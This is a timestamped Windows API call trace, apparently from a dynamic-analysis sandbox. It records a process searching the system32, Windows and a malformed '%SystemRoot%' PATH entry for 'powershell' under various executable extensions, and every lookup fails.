	[0736.572] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0736.573] SetErrorMode (uMode=0x1) returned 0x1
	[0736.573] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0736.581] SetErrorMode (uMode=0x1) returned 0x1
	[0736.582] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0736.582] SetErrorMode (uMode=0x1) returned 0x1
	[0736.583] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0738.185] SetErrorMode (uMode=0x1) returned 0x1
	[0738.186] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0738.186] SetErrorMode (uMode=0x1) returned 0x1
	[0738.186] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0738.195] SetErrorMode (uMode=0x1) returned 0x1
	[0738.197] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0738.197] SetErrorMode (uMode=0x1) returned 0x1
	[0738.197] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0738.205] SetErrorMode (uMode=0x1) returned 0x1
	[0738.206] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0738.207] SetErrorMode (uMode=0x1) returned 0x1
	[0738.207] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0738.215] SetErrorMode (uMode=0x1) returned 0x1
	[0738.216] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0738.216] SetErrorMode (uMode=0x1) returned 0x1
	[0738.216] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0738.224] SetErrorMode (uMode=0x1) returned 0x1
	[0738.225] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0738.225] SetErrorMode (uMode=0x1) returned 0x1
	[0738.226] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0739.688] SetErrorMode (uMode=0x1) returned 0x1
	[0739.689] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0739.689] SetErrorMode (uMode=0x1) returned 0x1
	[0739.689] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0739.698] SetErrorMode (uMode=0x1) returned 0x1
	[0739.699] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0739.699] SetErrorMode (uMode=0x1) returned 0x1
	[0739.699] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0739.707] SetErrorMode (uMode=0x1) returned 0x1
	[0739.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0739.709] SetErrorMode (uMode=0x1) returned 0x1
	[0739.709] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0739.709] SetErrorMode (uMode=0x1) returned 0x1
	[0739.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0739.710] SetErrorMode (uMode=0x1) returned 0x1
	[0739.710] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0739.710] SetErrorMode (uMode=0x1) returned 0x1
	[0739.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0739.710] SetErrorMode (uMode=0x1) returned 0x1
	[0739.711] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0739.711] SetErrorMode (uMode=0x1) returned 0x1
	[0739.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0739.711] SetErrorMode (uMode=0x1) returned 0x1
	[0739.711] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0739.711] SetErrorMode (uMode=0x1) returned 0x1
	[0739.712] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0739.712] SetErrorMode (uMode=0x1) returned 0x1
	[0739.712] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0739.712] SetErrorMode (uMode=0x1) returned 0x1
	[0739.712] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0739.712] SetErrorMode (uMode=0x1) returned 0x1
	[0739.712] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0739.713] SetErrorMode (uMode=0x1) returned 0x1
	[0739.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0739.713] SetErrorMode (uMode=0x1) returned 0x1
	[0739.713] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0739.713] SetErrorMode (uMode=0x1) returned 0x1
	[0739.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0739.714] SetErrorMode (uMode=0x1) returned 0x1
	[0739.714] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0739.714] SetErrorMode (uMode=0x1) returned 0x1
	[0739.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0739.714] SetErrorMode (uMode=0x1) returned 0x1
	[0739.714] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0739.714] SetErrorMode (uMode=0x1) returned 0x1
	[0739.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0739.715] SetErrorMode (uMode=0x1) returned 0x1
	[0739.715] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0739.715] SetErrorMode (uMode=0x1) returned 0x1
	[0739.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0739.715] SetErrorMode (uMode=0x1) returned 0x1
	[0739.715] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0739.716] SetErrorMode (uMode=0x1) returned 0x1
	[0739.716] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0739.716] SetErrorMode (uMode=0x1) returned 0x1
	[0739.716] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0739.716] SetErrorMode (uMode=0x1) returned 0x1
	[0739.716] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0739.717] SetErrorMode (uMode=0x1) returned 0x1
	[0739.717] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0739.717] SetErrorMode (uMode=0x1) returned 0x1
	[0739.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0739.717] SetErrorMode (uMode=0x1) returned 0x1
	[0739.717] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0739.718] SetErrorMode (uMode=0x1) returned 0x1
	[0739.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0739.718] SetErrorMode (uMode=0x1) returned 0x1
	[0739.718] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0739.718] SetErrorMode (uMode=0x1) returned 0x1
	[0739.718] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0739.719] SetErrorMode (uMode=0x1) returned 0x1
	[0739.719] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0739.719] SetErrorMode (uMode=0x1) returned 0x1
	[0739.719] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0739.719] SetErrorMode (uMode=0x1) returned 0x1
	[0739.719] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0739.720] SetErrorMode (uMode=0x1) returned 0x1
	[0739.720] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0739.720] SetErrorMode (uMode=0x1) returned 0x1
	[0739.720] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0739.720] SetErrorMode (uMode=0x1) returned 0x1
	[0739.720] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0739.720] SetErrorMode (uMode=0x1) returned 0x1
	[0739.720] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0739.721] SetErrorMode (uMode=0x1) returned 0x1
	[0739.721] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0739.721] SetErrorMode (uMode=0x1) returned 0x1
	[0739.721] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c81dac0 | out: lpFindFileData=0x1c81dac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0739.721] SetErrorMode (uMode=0x1) returned 0x1
	[0739.721] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c81d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0739.724] SetErrorMode (uMode=0x1) returned 0x1
